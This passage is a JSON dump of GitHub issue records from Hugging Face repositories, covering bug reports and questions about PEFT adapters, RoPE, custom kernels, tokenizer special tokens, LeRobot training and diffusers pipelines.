from_pretrained**\n```\npeft_backbone = PeftModel.from_pretrained(\n target_backbone,\n safe_encoder_adapter_path1,\n adapter_name=modality_name,\n is_trainable=False\n)\nstatus = peft_backbone.get_model_status()\ntarget_backbone.load_adapter(safe_encoder_adapter_path2, is_trainable=False, adapter_name=adapter2)\nstatus = peft_backbone.get_model_status()\n```\n\nstatus before load_adapter shows {'adapter1': False} while after the load_adapter {'adapter2': False, 'adapter1': True}\n\nI think the issue comes from BaseTurnerLayer.set_adapter that set True all my adapter1 lora layers' gradient while setting properly the adapter2 lora layers' gradient to False.\nBaseTurnerLayer.set_adapter is called when doing self.add_adapter in PeftModel.load_adapter.\n\n\n\n\n\n\n### Expected behavior\n\n**1) modules_to_save gradient true even when is_trainable=False**\n\nExpecting the gradients for modules_to_save layers to be false. It's working properly for lora layers.\n\n**2) Loading an adapter after using from_pretrained**\n\nExpecting adapter1 to remain gradient false (is_trainable=False during from_pretrained loading) even after loading another adapter.\n\n**Other informations:**\n\nRegarding issue 1), in the code of 2), the modules_to_save for adapter2 were properly set to false when using load_adapter with is_trainable=false.\n\n[TRAINABLE] base_model.model.blocks.39.modules_to_save.adapter1.mlp.fc2.bias - shape: (1408,)\n[FROZEN] base_model.model.blocks.39.modules_to_save.adapter2.norm1.weight - shape: (1408,)\n\nMore generally, is there any reason peftmodel has to change the requires_gradient of adapters when calling set_adapter? (https://github.com/huggingface/peft/issues/2749)\nI assume that it might be related to the fact that there might be a problem to have non activated adapter but with requires_gradient=True?\nWhen using the library I was expecting to be able to set what params needed to be trained on all my adapters upon loading them with from_pretrained and load_adapter (or manually) then simply switch between adapters during the training with set_adapter.\n", "url": "https://github.com/huggingface/peft/issues/2759", "state": "closed", "labels": [], "created_at": "2025-08-28T16:36:25Z", "updated_at": "2025-10-06T15:04:09Z", "comments": 8, "user": "NguyenRichard" }, { "repo": "huggingface/transformers", "number": 40462, "title": "Question about RoPE Implementation in modeling_llama: Should torch.cat be repeat_interleave?", "body": "Hi,\nI was going through the code for `modeling_llama` and the RoPE implementation. I came across the following function:\n\n```\ndef forward(self, x, position_ids):\n inv_freq_expanded = self.inv_freq[None, :, None].float().expand(position_ids.shape[0], -1, 1).to(x.device)\n position_ids_expanded = position_ids[:, None, :].float()\n\n device_type = x.device.type if isinstance(x.device.type, str) and x.device.type != \"mps\" else \"cpu\"\n with torch.autocast(device_type=device_type, enabled=False): # Force float32\n freqs = (inv_freq_expanded.float() @ position_ids_expanded.float()).transpose(1, 2)\n emb = torch.cat((freqs, freqs), dim=-1)\n cos = emb.cos() * self.attention_scaling\n sin = emb.sin() * self.attention_scaling\n\n return cos.to(dtype=x.dtype), sin.to(dtype=x.dtype)\n\n```\nI believe the line `emb = torch.cat((freqs, freqs), dim=-1)` should be replaced with `repeat_interleave`. This is because the cosine/sine angles for matrix multiplication should be structured like:\n```\n[cos(\u03b8\u2081), cos(\u03b8\u2081), cos(\u03b8\u2082), cos(\u03b8\u2082), cos(\u03b8\u2083), cos(\u03b8\u2083), ...]\n\n```\nThis way, further down the stream when we compute:\n```\nq_embed = (q * cos) + (rotate_half(q) * sin)\n```\n...the values are aligned properly for pairwise rotation. However, the current `torch.cat((freqs, freqs), dim=-1) ` should produce:\n```\n[cos(\u03b8\u2081), cos(\u03b8\u2082), cos(\u03b8\u2083), cos(\u03b8\u2081), cos(\u03b8\u2082), cos(\u03b8\u2083), ...]\n```\nwhich seems incorrect. Am I missing something?\nThanks,\nAbhidip", "url": "https://github.com/huggingface/transformers/issues/40462", "state": "closed", "labels": [], "created_at": "2025-08-26T16:32:41Z", "updated_at": "2025-08-27T10:01:11Z", "comments": 2, "user": "abhidipbhattacharyya" }, { "repo": "huggingface/transformers", "number": 40459, "title": "`use_kernels=True` does not invoke custom kernels", "body": "### System Info\n\n- `transformers` version: 4.56.0.dev0\n- Platform: Linux-5.4.0-216-generic-x86_64-with-glibc2.31\n- Python version: 3.12.7\n- Huggingface_hub version: 0.34.4\n- Safetensors version: 0.6.2\n- Accelerate version: 1.10.0\n- Accelerate config: not found\n- DeepSpeed version: not installed\n- PyTorch version (accelerator?): 2.8.0+cu128 (CUDA)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: No\n- Using GPU in script?: Yes\n- GPU type: NVIDIA A100-SXM4-80GB\n\n### Who can help?\n\n@ArthurZucker\n\n### Reproduction\n\n```python\nimport logging\nlogging.basicConfig(level=logging.INFO)\n\nimport torch\nfrom transformers import (\n AutoTokenizer, AutoModelForCausalLM,\n)\n\nmodel_id = \"openai/gpt-oss-20b\"\ntokenizer = AutoTokenizer.from_pretrained(model_id)\nmodel = AutoModelForCausalLM.from_pretrained(\n model_id,\n torch_dtype=\"auto\",\n device_map=\"auto,\n use_kernels=True,\n).eval()\n\nmessages = [\n {\"role\": \"system\", \"content\": \"What is Tensor Parallelism?\"},\n]\n\ninputs = tokenizer.apply_chat_template(\n messages,\n add_generation_prompt=True,\n return_tensors=\"pt\",\n return_dict=True,\n reasoning_effort=\"low\",\n).to(model.device)\n\nwith torch.inference_mode():\n generated = model.generate(\n **inputs,\n do_sample=False,\n temperature=None,\n max_new_tokens=64,\n disable_compile=True,\n )\n\ndecoded_generation = tokenizer.batch_decode(generated, skip_special_tokens=True)[0]\nprint(decoded_generation)\n```\n\n### Expected behavior\n\nNoting that I have activated logging, I should be able to see the logs for all the custom kernels being invoked. While the `LigerRMSNorm` is being invoked I do not see the `MegaBlocksMoeMLP` as it should be (as [stated in the modelling file here](https://github.com/huggingface/transformers/blob/263d06fedc17bb28f70dabe2acae562bc617ef9b/src/transformers/models/gpt_oss/modeling_gpt_oss.py#L156)).\n\nI also note that while the `LigerRMSNorm` is invoked but it complains that it cannot be used due to not being compatible with compile:\n```\nINFO:root:Using layer `LigerRMSNorm` from repo `kernels-community/liger_kernels` (revision: main) for layer `LigerRMSNorm`\nINFO:root:Layer does not support torch.compile, using fallback\n```\nI have used `disable_compile=True,` in the `.generate()` method, which should have taken care of the issue.\n\n### Solution\n\nThe way I could invoke the custom kernels was to swap out these lines:\nhttps://github.com/huggingface/transformers/blob/main/src/transformers/modeling_utils.py#L5241-L5243\n\nWith the following\n```py\n from kernels import Device, Mode, kernelize\n\n kernelize(model, device=Device(type=model.device.type), mode=Mode.INFERENCE)\n```\nWhile this is not the solution, and we should infer what mode the model is in, I thought of listing the current personal solution down for ease of ideation.", "url": "https://github.com/huggingface/transformers/issues/40459", "state": "closed", "labels": [ "bug" ], "created_at": "2025-08-26T13:32:35Z", "updated_at": "2025-09-16T08:50:55Z", "comments": 1, "user": "ariG23498" }, { "repo": "huggingface/diffusers", "number": 12241, "title": "WAN2.1 FLF2V: Incorrect MASK Creation????", "body": "Hello! I think that it is maybe error. (Or not, please explain it for me!!)\n\nIn **WanImageToVideoPipeline** class in `pipline_wan_i2v.py`, \n\"Image\"\n(the code is the part of `prepare_latents` function)\n\n**For I2V**, masking shape like as below:\n```\n[[1, 0, 0, ... , 0]\n[1, 0, 0, ... , 0]\n[1, 0, 0, ... , 0]\n[1, 0, 0, ... , 0]]\n```\nI understood: when the mask is 1, input video frame does not change.\n(*Mask shape: [1, 4, 21, 60, 104] = [B, C, F, H, W])\n \n**But in the FLF2V case,** masking shape like as below:\n```\n[[1, 0, 0, ... , 0]\n[1, 0, 0, ... , 0]\n[1, 0, 0, ... , 0]\n**[1, 0, 0, ... , 1]]**\n```\nHere, **why the last frame mask has 1 only in last channel??**\nIs there anyone who can explain this part? ", "url": "https://github.com/huggingface/diffusers/issues/12241", "state": "open", "labels": [], "created_at": "2025-08-26T12:23:09Z", "updated_at": "2025-08-27T02:10:49Z", "comments": 1, "user": "KyujinHan" }, { "repo": "huggingface/lerobot", "number": 1792, "title": "how to train lerobot model offline with offline data?", "body": "Hi, I'm trying to configure lerobot to train with pre-downloaded models and datasets. I'm stuck, however, with how to organize the model cache and dataset cache, and how to tell the train script I'm using offline everything?\n\nI tried to download the model and dataset:\n```\n$ hf download lerobot/pi0 --cache-dir ~/lerobot_download/hf_models/lerobot/pi0/\n$ hf download lerobot/aloha_sim_transfer_cube_human --repo-type dataset --cache-dir ~/lerobot_download/hf_datasets/lerobot/aloha_sim_transfer_cube_human/\n```\n", "url": "https://github.com/huggingface/lerobot/issues/1792", "state": "closed", "labels": [], "created_at": "2025-08-26T10:20:56Z", "updated_at": "2025-09-03T10:48:37Z", "user": "dalishi" }, { "repo": "huggingface/accelerate", "number": 3748, "title": "How pass two layer class by use --fsdp_transformer_layer_cls_to_wrap?", "body": "", "url": "https://github.com/huggingface/accelerate/issues/3748", "state": "closed", "labels": [], "created_at": "2025-08-26T08:56:32Z", "updated_at": "2025-08-26T09:14:18Z", "user": "sunjian2015" }, { "repo": "huggingface/diffusers", "number": 12239, "title": "Support for InfiniteTalk", "body": "### Model/Pipeline/Scheduler description\n\nhttps://huggingface.co/MeiGen-AI/InfiniteTalk is a wonderful audio driven video generation model and can also support infinite frame , which is based on wan2.1. The demo and user's workflow is also awesome. some examples: https://www.runninghub.cn/ai-detail/1958438624956203010\n\n### Open source status\n\n- [x] The model implementation is available.\n- [x] The model weights are available (Only relevant if addition is not a scheduler).\n\n### Provide useful links for the implementation\n\nhttps://huggingface.co/MeiGen-AI/InfiniteTalk\nhttps://github.com/MeiGen-AI/InfiniteTalk", "url": "https://github.com/huggingface/diffusers/issues/12239", "state": "open", "labels": [ "help wanted", "New pipeline/model", "contributions-welcome" ], "created_at": "2025-08-26T06:57:43Z", "updated_at": "2025-09-05T00:18:46Z", "comments": 1, "user": "supermeng" }, { "repo": "huggingface/transformers", "number": 40406, "title": "Cache tokenlizer", "body": "### Feature request\n\nI am using Grounding DINO, which makes use of the `bert-base-uncanned` tokenlizer. Unfortunately, this model is never downloaded to cache, forcing a remote call to the API. Please allow for tokenlizer to be cached locally.\n\n### Motivation\n\nI want to use my software offline.\n\n### Your contribution\n\nI'm trying to find a way to download it manually as a workaround.", "url": "https://github.com/huggingface/transformers/issues/40406", "state": "open", "labels": [ "Feature request" ], "created_at": "2025-08-24T08:36:14Z", "updated_at": "2025-09-10T11:49:06Z", "comments": 5, "user": "axymeus" }, { "repo": "huggingface/tokenizers", "number": 1851, "title": "SentencePieceBPE + Unicode NFD preprocessing leads to noise ?", "body": "Hi,\nI have had the issue multiple times, so I assume I am doing something wrong.\n\n**Versions:**\n- tokenizers==0.21.4\n- transformers==4.55.4\n\n**Training script**\n\n```py\nfrom transformers import PreTrainedTokenizerFast\nfrom pathlib import Path\nfrom read import get_texts_iter_for_tokenizer\nfrom tokenizers import SentencePieceBPETokenizer, normalizers, pre_tokenizers\n\ndef main():\n output_dir = Path(\"hf_tokenizer\")\n output_dir.mkdir(parents=True, exist_ok=True)\n\n # Dump texts to a file\n texts = get_texts_iter_for_tokenizer()\n\n # Train SentencePiece model\n tokenizer = SentencePieceBPETokenizer()\n\n # Adding normalization and pre_tokenizer\n tokenizer.normalizer = normalizers.Sequence([normalizers.NFD()])\n tokenizer.pre_tokenizer = pre_tokenizers.ByteLevel()\n\n # Adding special tokens and creating trainer instance\n special_tokens = [\"\", \"\", \"\", \"\", \"\"]\n\n # Training from iterator REMEMBER it's training on test set...\n tokenizer.train_from_iterator(texts, special_tokens=special_tokens, show_progress=True)\n\n fast_tokenizer = PreTrainedTokenizerFast(\n tokenizer_object=tokenizer,\n unk_token=\"\",\n pad_token=\"\",\n cls_token=\"\",\n sep_token=\"\",\n mask_token=\"\"\n )\n fast_tokenizer.save_pretrained(str(output_dir))\n```\n\nScript to reproduce bug:\n\n```py\nfrom transformers import PreTrainedTokenizerFast\n\nhf_tokenizer = PreTrainedTokenizerFast.from_pretrained(\"hf_tokenizer\")\n\n# Test\nprint(hf_tokenizer.tokenize(\"\u204ai\u0303 re\u0303 dn\u0303i u\u033esum\"))\n# ['\u00e2\u0123\u012c', 'i', '\u00cc\u0125', '\u0120re', '\u00cc\u0125', '\u0120dn', '\u00cc\u0125', 'i', '\u0120u', '\u00cc\u00be', 'sum']\nprint(hf_tokenizer.decode(hf_tokenizer.encode(\"\u204ai\u0303 re\u0303 dn\u0303i u\u033esum\"))\n# \u00e2\u0123\u012ci\u00cc\u0125\u0120re\u00cc\u0125\u0120dn\u00cc\u0125i\u0120u\u00cc\u00besum\n```\n\nI assume I am doing something wrong around preprocessing / postprocessing ?\n\n\n\n", "url": "https://github.com/huggingface/tokenizers/issues/1851", "state": "open", "labels": [], "created_at": "2025-08-24T08:28:08Z", "updated_at": "2025-09-17T09:33:11Z", "comments": 3, "user": "PonteIneptique" }, { "repo": "huggingface/coreml-examples", "number": 17, "title": "how to get absolute depth\uff0cmeters\uff1f", "body": "how to get absolute depth\uff0cmeters\uff1f", "url": "https://github.com/huggingface/coreml-examples/issues/17", "state": "open", "labels": [], "created_at": "2025-08-24T03:20:58Z", "updated_at": "2025-08-24T03:20:58Z", "user": "jay25208" }, { "repo": "huggingface/transformers", "number": 40398, "title": "NVIDIA RADIO-L", "body": "### Model description\n\nWhile exploring, I came across [nvidia/RADIO-L](https://huggingface.co/nvidia/RADIO-L) and was wondering about its current support.\n\n1. May I ask if RADIO-L is already supported in Transformers?\n2. If not, would it be considered suitable to add?\n3. If a model requires trust_remote_code=True, what does that signify regarding its suitability for addition to Transformers?\n\nPlease share the general criteria for models to be added to Transformers.\n\nThank you very much for your guidance\n\ncc: @zucchini-nlp @Rocketknight1 \n\n### Open source status\n\n- [x] The model implementation is available\n- [x] The model weights are available\n\n### Provide useful links for the implementation\n\n_No response_", "url": "https://github.com/huggingface/transformers/issues/40398", "state": "open", "labels": [ "New model" ], "created_at": "2025-08-23T11:14:42Z", "updated_at": "2025-08-26T14:44:11Z", "comments": 4, "user": "Uvi-12" }, { "repo": "huggingface/diffusers", "number": 12222, "title": "[Contribution welcome] adding a fast test for Qwen-Image Controlnet Pipeline", "body": "We are looking for help from community to add a fast time for this PR \nhttps://github.com/huggingface/diffusers/pull/12215\n\nYou can add a file under this folder:\nhttps://github.com/huggingface/diffusers/tree/main/tests/pipelines/qwenimage\n\n\nYou can reference other tests we added for qwee pipelines [example](https://github.com/huggingface/diffusers/blob/main/tests/pipelines/qwenimage/test_qwenimage.py), as well as controlnet fasts tests [example](https://github.com/huggingface/diffusers/tree/main/tests/pipelines/controlnet_flux)", "url": "https://github.com/huggingface/diffusers/issues/12222", "state": "closed", "labels": [ "good first issue", "help wanted", "contributions-welcome" ], "created_at": "2025-08-22T21:04:50Z", "updated_at": "2025-08-25T01:58:59Z", "comments": 6, "user": "yiyixuxu" }, { "repo": "huggingface/diffusers", "number": 12221, "title": "[Looking for community contribution] support DiffSynth Controlnet in diffusers", "body": "### Model/Pipeline/Scheduler description\n\nHi!\nWe want to add first party support for DiffSynth controlnet in diffusers, and we are looking for some help from the community! \n\nLet me know if you're interested! \n\n\n### Open source status\n\n- [x] The model implementation is available.\n- [x] The model weights are available (Only relevant if addition is not a scheduler).\n\n### Provide useful links for the implementation\n\nhttps://huggingface.co/SahilCarterr/Qwen-Image-Blockwise-ControlNet-Canny\nhttps://huggingface.co/SahilCarterr/Qwen-Image-Blockwise-ControlNet-Depth", "url": "https://github.com/huggingface/diffusers/issues/12221", "state": "open", "labels": [ "help wanted", "Good second issue", "contributions-welcome" ], "created_at": "2025-08-22T20:49:18Z", "updated_at": "2025-09-11T10:01:08Z", "comments": 5, "user": "yiyixuxu" }, { "repo": "huggingface/safetensors", "number": 649, "title": "How to determine if a file is a safetensor file", "body": "Is there a good and fast way to determine if a file is a safetensors file. We would like to avoid reading the whole header. \n\nBackground we are currently trying to add safetensors as a datatype to the Galaxy project: https://github.com/galaxyproject/galaxy/pull/20754", "url": "https://github.com/huggingface/safetensors/issues/649", "state": "open", "labels": [], "created_at": "2025-08-22T09:17:49Z", "updated_at": "2025-09-03T11:08:30Z", "user": "bernt-matthias" }, { "repo": "huggingface/lerobot", "number": 1775, "title": "What's the finetuning method? Is it all full-finetuning?", "body": "I could't find any thing about LORA finetuning, is the default method full-finetuning by now?", "url": "https://github.com/huggingface/lerobot/issues/1775", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2025-08-22T06:48:25Z", "updated_at": "2025-10-07T20:55:10Z", "user": "lin-whale" }, { "repo": "huggingface/lerobot", "number": 1774, "title": "Finetune smolvla with vision encoder", "body": "### System Info\n\n```Shell\n- `lerobot` version: 0.1.0\n- Platform: Linux-6.8.0-65-generic-x86_64-with-glibc2.35\n- Python version: 3.10.18\n- Huggingface_hub version: 0.33.4\n- Dataset version: 3.6.0\n- Numpy version: 2.2.6\n- PyTorch version (GPU?): 2.7.1+cu126 (True)\n- Cuda version: 12060\n- Using GPU in script?: \n```\n\n### Information\n\n- [ ] One of the scripts in the examples/ folder of LeRobot\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\nnothing\n\n### Expected behavior\n\nI found that when attempting to fine-tune the model to grasp objects of different colors but identical shapes, it consistently grasped the wrong object. I found that the output feature differences from the VLM for the same image, such as \u201cgrasp the green duck into the box\u201d versus \u201cgrasp the yellow duck into the box,\u201d were nearly zero. Is it possible that the VLM has weak color differentiation capabilities? Can the official support fine-tuning the visual encoder together?", "url": "https://github.com/huggingface/lerobot/issues/1774", "state": "open", "labels": [ "question", "policies", "good first issue" ], "created_at": "2025-08-22T05:20:58Z", "updated_at": "2025-10-08T11:31:02Z", "user": "THU-yancow" }, { "repo": "huggingface/transformers", "number": 40366, "title": "[Feature] Support fromjson in jinja2 chat template rendering", "body": "### Feature request\n\nGLM45 requires `fromjson` in jinja2 to deserialize str typed `tool_calls.function.arguments` to dict within chat template so it can iterate over `arguments`'s k-v within jinja2 chat template. \n\n```\n{% for tc in m.tool_calls %}\n{%- if tc.function %}\n{%- set tc = tc.function %}\n{%- endif %}\n{{ '\\n' + tc.name }}\n{% set _args = tc.arguments | fromjson %}\n{% for k, v in _args.items() %}\n{{ k }}\n{{ v \\| tojson(ensure_ascii=False) if v is not string else v }}\n{% endfor %}\n{% endfor %}\n{% endif %}\n```\n\nhttps://huggingface.co/zai-org/GLM-4.5/blob/main/chat_template.jinja#L75\n\n### Motivation\n\nGLM45 requires `fromjson` in jinja2 to deserialize str typed `tool_calls.function.arguments` to dict within chat template so it can iterate over `arguments`'s k-v within jinja2 chat template. \n\n```\n{% for tc in m.tool_calls %}\n{%- if tc.function %}\n{%- set tc = tc.function %}\n{%- endif %}\n{{ '\\n' + tc.name }}\n{% set _args = tc.arguments | fromjson %}\n{% for k, v in _args.items() %}\n{{ k }}\n{{ v \\| tojson(ensure_ascii=False) if v is not string else v }}\n{% endfor %}\n{% endfor %}\n{% endif %}\n```\n\nhttps://huggingface.co/zai-org/GLM-4.5/blob/main/chat_template.jinja#L75\n\n### Your contribution\n\nI will submit a PR", "url": "https://github.com/huggingface/transformers/issues/40366", "state": "open", "labels": [ "Feature request" ], "created_at": "2025-08-22T05:11:06Z", "updated_at": "2025-08-22T05:18:45Z", "comments": 1, "user": "byjiang1996" }, { "repo": "huggingface/peft", "number": 2749, "title": "Set multiple adapters actively when training", "body": "Hi! In incremental scenarios, I want to train a new adapter while keeping some old adapters actively. Notice that PeftModel can set active adapter by \"model.set_adapter()\". But every time can set only one adapter, where the type of args \"adapter_name\" is \"str\" rather than \"List[str]\". I also notice that class \"PeftMixedModel\" can set multiple adapters actively but only support for inference, and this class uses \"model.base_model.set_adapter()\" to achieve it. So I am not sure can I also set multiple adapters actively when training. My code is as following:\n\n```python\nmodel = AutoModelForCausalLM.from_pretrained()\npeft_config = LoraConfig()\nmodel = get_peft_model(model, peft_config, adapter_name=\"new\")\nmodel.load_adapter(adapter_path, adapter_name=\"old\")\nmodel.base_model.set_adapter([\"new\", \"old\"])\nfor name, param in model.named_parameters():\n if \"lora_A.old\" in name or \"lora_B.old\" in name:\n param.requires_grad = False\ntraining_args = TrainingArguments()\ntrainer = Trainer()\ntrainer.train()\n```\n", "url": "https://github.com/huggingface/peft/issues/2749", "state": "closed", "labels": [], "created_at": "2025-08-21T09:59:25Z", "updated_at": "2025-09-29T15:04:15Z", "comments": 4, "user": "Yongyi-Liao" }, { "repo": "huggingface/lerobot", "number": 1765, "title": "Questions about using LIBERO dataset (loss starts extremely high)", "body": "Hello,\n\nI am training on the \"**IPEC-COMMUNITY/libero_spatial_no_noops_1.0.0_lerobot**\" dataset, but I encountered an issue(here is the dateset:https://huggingface.co/datasets/IPEC-COMMUNITY/libero_spatial_no_noops_1.0.0_lerobot):\n\nAt the very beginning of training, the loss is extremely high (around 500).\n\nI would like to clarify a few points:\n\nIs the policy output expected to be relative actions or absolute actions?\nDo I need to perform any preprocessing on the dataset? For example:\nNormalizing the gripper action to the range [-1, 1]?\nAny other scaling or transformation?\n\nWhat is the exact relationship between the action and state in the dataset?\nI noticed that trajectories sometimes look different than expected(shown in the figure below).\nDo we need to process either the action or state to align them?\n\nAny guidance on the correct usage of the dataset would be greatly appreciated. Thanks!\n\n\"Image\"\n\n", "url": "https://github.com/huggingface/lerobot/issues/1765", "state": "open", "labels": [ "question", "dataset", "simulation" ], "created_at": "2025-08-21T05:06:51Z", "updated_at": "2025-09-23T09:46:41Z", "user": "hamondyan" }, { "repo": "huggingface/transformers", "number": 40330, "title": "open-qwen2vl-base", "body": "### Model description\n\nis there any plan to add open-qwen2vl-base model? \n\n### Open source status\n\n- [x] The model implementation is available\n- [x] The model weights are available\n\n### Provide useful links for the implementation\n\n_No response_", "url": "https://github.com/huggingface/transformers/issues/40330", "state": "open", "labels": [ "New model" ], "created_at": "2025-08-21T02:24:01Z", "updated_at": "2025-08-23T10:18:28Z", "comments": 5, "user": "olccihyeon" }, { "repo": "huggingface/tokenizers", "number": 1850, "title": "Safe encoding of strings that might contain special token text", "body": "When feeding untrusted string inputs into an LLM, it's often important not convert any of the input into special tokens, which might indicate message boundaries or other syntax. Among other reasons, this is important for guarding against prompt injection attacks.\n\ntiktoken provides a way to control how the encoding deals with special tokens, using the `allowed_special` and `disallowed_special` arguments. For example.\n\n```python\nenc = tiktoken.get_encoding(\"o200k_base\")\nenc.encode(\"<|endoftext|>\", disallowed_special=[]) # => [27, 91, 419, 1440, 919, 91, 29]\nenc.encode(\"<|endoftext|>\") # => ValueError\nenc.encode(\"<|endoftext|>\", allowed_special=set([\"<|endoftext|>\"]) # => [199999]\n```\n\nHowever, I can't figure out how to avoid tokenizing strings like <|im_start|> into special tokens, when using the tokenizers library. Note that I want to be able to *decode* the special token to its string representation for visualization. However, I want to make sure that when I call `encode`, I don't get a special token -- I tokenize the string representation as if there was no <|im_start|> special token. \n\nMaybe the easiest way to do this is to create two separate tokenizers, by creating new json files, but this is pretty inconvenient.", "url": "https://github.com/huggingface/tokenizers/issues/1850", "state": "closed", "labels": [], "created_at": "2025-08-21T00:53:17Z", "updated_at": "2025-09-01T18:03:59Z", "comments": 5, "user": "joschu" }, { "repo": "huggingface/peft", "number": 2746, "title": "Gemma 2/3 Attention: Expected a single attention mask, got 2 instead", "body": "Hi! I'm getting this error `ValueError: Expected a single attention mask, got 2 instead` at inference (after prompt tuning)--I've only had this happen with the Gemma 2 and 3 models, so it might have something to do with their specific attention mechanism. Is there a workaround (or am I maybe missing something)?\n\nI'm running the following:\n```\nmodel_name = \"google/gemma-2-2b\"\ntokenizer = AutoTokenizer.from_pretrained(model_name)\nmodel = AutoModelForCausalLM.from_pretrained(model_name, torch_dtype=torch.float16, device_map=\"auto\")\n\nsoft_model = get_peft_model(model, prompt_config)\n\ninputs = tokenizer(model_instruction, return_tensors=\"pt\")\noutputs = soft_model.generate(\n input_ids=inputs[\"input_ids\"],\n attention_mask=inputs[\"attention_mask\"],\n max_new_tokens=num_gen_tokens,\n eos_token_id=tokenizer.eos_token_id,\n )\n```", "url": "https://github.com/huggingface/peft/issues/2746", "state": "closed", "labels": [], "created_at": "2025-08-20T18:08:02Z", "updated_at": "2025-08-27T02:43:22Z", "comments": 8, "user": "michelleezhang" }, { "repo": "huggingface/transformers", "number": 40323, "title": "Is there a plan to add DINOv3 into AutoBackbone?", "body": "### Feature request\n\nIs there a plan to add DINOv3 to AutoBackbone. At present, DINOv2 is already inside, and I think DINOv3 should be able to inherit it directly. Appreciate a lot.\n\n### Motivation\n\nFor the convenience of use\n\n### Your contribution\n\nDINOv3 should be able to inherit from DINOv2 directly.", "url": "https://github.com/huggingface/transformers/issues/40323", "state": "closed", "labels": [ "Feature request", "Vision" ], "created_at": "2025-08-20T16:02:45Z", "updated_at": "2025-11-11T16:22:08Z", "comments": 4, "user": "Farenweh" }, { "repo": "huggingface/transformers", "number": 40263, "title": "[VLMs] How to process a batch that contains samples with and without images?", "body": "Is there a **standard** way to process a batch that contains samples with and without images?\n\nFor example:\n\n```python\nfrom transformers import AutoProcessor\nfrom PIL import Image\nimport numpy as np\n\nmodel_id = ... # tested are \"google/gemma-3-4b-it\", \"HuggingFaceM4/idefics2-8b\", \"HuggingFaceM4/Idefics3-8B-Llama3\", \"HuggingFaceTB/SmolVLM2-2.2B-Instruct\", \"llava-hf/llava-1.5-7b-hf\", \"llava-hf/llava-v1.6-mistral-7b-hf\", \"OpenGVLab/InternVL3-8B-hf\", \"Qwen/Qwen2-VL-2B-Instruct\",\"Qwen/Qwen2.5-VL-3B-Instruct\"]\nprocessor = AutoProcessor.from_pretrained(model_id)\n\nmessages = [\n [{\"role\": \"user\", \"content\": [{\"type\": \"text\", \"text\": \"What's the capital of France?\"}]}],\n [{\"role\": \"user\", \"content\": [{\"type\": \"image\"}, {\"type\": \"text\", \"text\": \"What is it?\"}]}],\n]\ntexts = processor.apply_chat_template(messages)\n\nimage = Image.fromarray(\n np.random.uniform(low=0.0, high=255.0, size=(32, 48, 3)).astype(np.uint8)\n)\nimages = [[], [image]]\n\nprocessor(images=images, text=texts)\n```\n\nThis fails for all models I tested.\n\n\n```python\nimages=[image] # The only syntax I found that works for some models: llava-hf/llava-1.5-7b-hf, llava-hf/llava-v1.6-mistral-7b-hf, OpenGVLab/InternVL3-8B-hf, Qwen/Qwen2-VL-2B-Instruct, Qwen/Qwen2.5-VL-3B-Instruct\nimages = [None, [image]] # always fails\nimages = [None, image] # always fails\nimages = [[], [image]] # always fails\n```\n\n### Expected behavior\n\nThere should be a standard / documented way to batch process mixed inputs (some samples with images, some without).\n\n\n", "url": "https://github.com/huggingface/transformers/issues/40263", "state": "closed", "labels": [], "created_at": "2025-08-19T05:09:36Z", "updated_at": "2025-09-18T08:08:51Z", "user": "qgallouedec" }, { "repo": "huggingface/diffusers", "number": 12185, "title": "What's the difference between DreamBooth LoRa and traditional LoRa?", "body": "I see a lot of examples using DreamBooth LoRa training code. What's the difference between this and traditional LoRa training? Can this DreamBooth LoRa training code be adapted to standard SFT LoRa code? Does disabling with_prior_preservation return normal LoRa training?", "url": "https://github.com/huggingface/diffusers/issues/12185", "state": "open", "labels": [], "created_at": "2025-08-19T03:32:30Z", "updated_at": "2025-08-19T15:04:22Z", "comments": 3, "user": "MetaInsight7" }, { "repo": "huggingface/trl", "number": 3918, "title": "How to use trl-SFTTrainer to train Qwen-30B-A3B?", "body": "Has anyone tried using TRL to train Qwen-30B-A3B-Instruct-2507?", "url": "https://github.com/huggingface/trl/issues/3918", "state": "open", "labels": [ "\u2753 question" ], "created_at": "2025-08-19T03:04:36Z", "updated_at": "2025-08-19T03:11:30Z", "user": "JeffWb" }, { "repo": "huggingface/datasets", "number": 7739, "title": "Replacement of \"Sequence\" feature with \"List\" breaks backward compatibility", "body": "PR #7634 replaced the Sequence feature with List in 4.0.0, so datasets saved with version 4.0.0 with that feature cannot be loaded by earlier versions. There is no clear option in 4.0.0 to use the legacy feature type to preserve backward compatibility.\n\nWhy is this a problem? I have a complex preprocessing and training pipeline dependent on 3.6.0; we manage a very large number of separate datasets that get concatenated during training. If just one of those datasets is saved with 4.0.0, they become unusable, and we have no way of \"fixing\" them. I can load them in 4.0.0 but I can't re-save with the legacy feature type, and I can't load it in 3.6.0 for obvious reasons.\n\nPerhaps I'm missing something here, since the PR says that backward compatibility is preserved; if so, it's not obvious to me how.", "url": "https://github.com/huggingface/datasets/issues/7739", "state": "open", "labels": [], "created_at": "2025-08-18T17:28:38Z", "updated_at": "2025-09-10T14:17:50Z", "comments": 1, "user": "evmaki" }, { "repo": "huggingface/gsplat.js", "number": 119, "title": "How to 4DGS (.splatv)", "body": "How can I generate the .splatv file and get it running on my local server?", "url": "https://github.com/huggingface/gsplat.js/issues/119", "state": "open", "labels": [], "created_at": "2025-08-18T07:35:04Z", "updated_at": "2025-08-18T07:35:04Z", "user": "CetosEdit" }, { "repo": "huggingface/diffusers", "number": 12165, "title": "Failed to finetune the pre-trained model of 'stable-diffusion-v1-4' on image inpainting task", "body": "I finetuned the pre-trained model of 'stable-diffusion-inpainting' on image inpainting task, and all work well as the model is trained on image inpainting. But when I finetuned with the pre-trained model of 'stable-diffusion-v1-4' which is trained on text-to-image, the loss is NaN and the result is pure black.\n\nAs the two models have different input channels for unet, I have changed the unet input channels of 'stable-diffusion-v1-4' to be fit for image inpainting task. So far, the code can run but the loss is NaN. I do not know where is the problem, how to finetune the pre-trained model of 'stable-diffusion-inpainting' on image inpainting task ? should I change some hyparameters? Any help will be appreciated, thanks!", "url": "https://github.com/huggingface/diffusers/issues/12165", "state": "closed", "labels": [], "created_at": "2025-08-17T07:15:36Z", "updated_at": "2025-09-07T09:35:38Z", "comments": 7, "user": "micklexqg" }, { "repo": "huggingface/gym-hil", "number": 27, "title": "How to close the gripper in gym-hill-sim?", "body": "Hello all.\n\nI'm using macOS to practice with tutorial gym-hill-sim.\nI figured out how to move robot like x,y,z but, it's impossible to close the gripper....\n\nCould you all please share the correct 